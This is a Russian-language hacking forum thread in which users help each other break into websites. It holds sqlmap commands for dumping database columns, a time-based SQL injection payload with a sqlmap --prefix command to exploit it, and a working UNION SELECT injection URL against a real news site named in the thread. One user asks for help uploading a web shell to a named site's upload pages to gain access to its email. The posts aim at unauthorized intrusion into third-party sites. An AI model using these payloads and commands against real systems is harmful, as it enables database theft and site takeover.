 |
|
23.01.2014, 18:04
|
|
Новичок
Регистрация: 19.01.2014
Сообщений: 17
Провел на форуме:
5283
Репутация:
0
|
|
Сообщение от BigBear
Браузер
Всмысле браузер? В настройках Javascript включён.
|
|
|
23.01.2014, 18:22
|
|
Флудер
Регистрация: 25.12.2010
Сообщений: 2,173
Провел на форуме:
697724
Репутация:
372
|
|
nike001,
http://forum.antichat.net/showthread.php?t=20140
Сообщение от lіgendо
лучше в опере пробовать, хромы и фф режут хсс
Сообщение от M_script
Opera 12.x в идеале. Лень объяснять, кто знает - поймет, кто захочет - поверит, остальные - лесом.
|
|
|
|
24.01.2014, 22:17
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
Провел на форуме:
20084
Репутация:
0
|
|
Подскажите по sqlmap.
Задача: сдампить определенные колонки в таблице
Код:
python sqlmap.py -u http://site.ru?a=inject --dump -D db_name -T table_name -C column1
В вышеприведенном коде сдампится column1 , а мне нужно еще column2. Как синтаксически правильно дописать вторую колонку? |
|
|
|
25.01.2014, 02:05
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
erwap
-C "column1,column2,column3"
|
|
|
|
25.01.2014, 12:01
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
304044
Репутация:
21
|
|
1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&Sectio nID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac
не как не смог сглмапом так же Хавижом( в чем проблема не пойму(
2) aztexnika.az/upload.php
aztexnika.az/admin/upload.php
нужно залить шелл. нужен доступ емаилу с этого сайта(
|
|
|
|
25.01.2014, 17:43
|
|
Новичок
Регистрация: 13.04.2012
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Есть уязвимость. SQLi
Предположим так (заменил дабы не палить):
Url: http://www.site.com/threadrate.php?t=104496
Method: post
Param: securitytoken
Payload: "));SELECT+SLEEP(15)/*
Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5
как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
А без него уязвимость не видит. Прошу, помогите
|
|
|
|
25.01.2014, 20:33
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от BigBanMan
Есть уязвимость. SQLi
Предположим так (заменил дабы не палить):
Url: http://www.site.com/threadrate.php?t=104496
Method: post
Param: securitytoken
Payload: "));SELECT+SLEEP(15)/*
Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5
как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
А без него уязвимость не видит. Прошу, помогите
Прежде чем говорить - проверьте.
За payload отвечает две опции:
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
соответственно Ваш запрос будет примерно таким:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://www.site.com/threadrate.php?t=104496"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"securitytoken=guest*&t=104496&pp=10&page=1&vote=5"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"));"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"MySQL"[/COLOR][/COLOR]
|
|
|
|
25.01.2014, 21:29
|
|
Новичок
Регистрация: 13.04.2012
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Zed0x
Прежде чем говорить - проверьте.
За payload отвечает две опции:
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
соответственно Ваш запрос будет примерно таким:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://www.site.com/threadrate.php?t=104496"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"securitytoken=guest*&t=104496&pp=10&page=1&vote=5"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"));"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"MySQL"[/COLOR][/COLOR]
Для начала спасибо вам, попробую.
А так я и вправду видел это, но как это применять в команде не понимал. Тоесть если у меня:
Payload: '"%2bSLEEP(15)--
то команда будет включать
?
|
|
|
|
26.01.2014, 00:48
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от 2fed
1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&Sectio nID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac
не как не смог сглмапом так же Хавижом( в чем проблема не пойму(
Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search= asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode= allwords&SectionID=-1&Lang=_Ru
|
|
|
|
26.01.2014, 02:00
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
304044
Репутация:
21
|
|
Сообщение от Tigger
Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search=
%Inject_Here%
&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode= allwords&SectionID=-1&Lang=_Ru
опять ничего(
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
